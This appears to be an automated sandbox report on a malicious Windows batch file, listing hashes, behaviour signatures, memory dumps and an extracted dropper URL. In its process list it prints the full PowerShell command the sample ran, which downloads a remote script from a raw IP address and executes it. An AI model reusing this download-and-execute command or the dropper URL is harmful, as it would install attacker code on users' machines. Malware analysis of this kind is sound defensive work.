Analysis
-
max time kernel
15s -
max time network
45s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
29-09-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
87f461a62a7de4013da81005cdc4ac08.bat
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
87f461a62a7de4013da81005cdc4ac08.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
87f461a62a7de4013da81005cdc4ac08.bat
-
Size
213B
-
MD5
b80441d6d88bed0ea2c4aee192320ab0
-
SHA1
cc5062b68194e72fcc39d78ec794eef77c631e11
-
SHA256
3f89ce5be773c28644ec626cd94037a02958f69cb9a571c6c69788af498e06c4
-
SHA512
fd370a4178ed0204241dd84df0e234b4c971c27ef8d6d7a423a1a1e0679ffd82d3879642f9d484f0089ea11785361104073fae26f860dbabd594b8300de3bd35
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/87f461a62a7de4013da81005cdc4ac08
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1784 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1784 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1784 powershell.exe 1784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1784 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1620 wrote to memory of 1784 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 1784 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 1784 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 1784 1620 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\87f461a62a7de4013da81005cdc4ac08.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/87f461a62a7de4013da81005cdc4ac08');Invoke-AJLTPZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1784-0-0x0000000000000000-mapping.dmp
-
memory/1784-1-0x0000000074650000-0x0000000074D3E000-memory.dmpFilesize
6.9MB
-
memory/1784-2-0x0000000002310000-0x0000000002311000-memory.dmpFilesize
4KB
-
memory/1784-3-0x0000000004900000-0x0000000004901000-memory.dmpFilesize
4KB
-
memory/1784-4-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/1784-5-0x0000000004850000-0x0000000004851000-memory.dmpFilesize
4KB
-
memory/1784-8-0x0000000006000000-0x0000000006001000-memory.dmpFilesize
4KB
-
memory/1784-13-0x0000000006090000-0x0000000006091000-memory.dmpFilesize
4KB
-
memory/1784-14-0x0000000006150000-0x0000000006151000-memory.dmpFilesize
4KB
-
memory/1784-21-0x0000000006290000-0x0000000006291000-memory.dmpFilesize
4KB
-
memory/1784-22-0x00000000062C0000-0x00000000062C1000-memory.dmpFilesize
4KB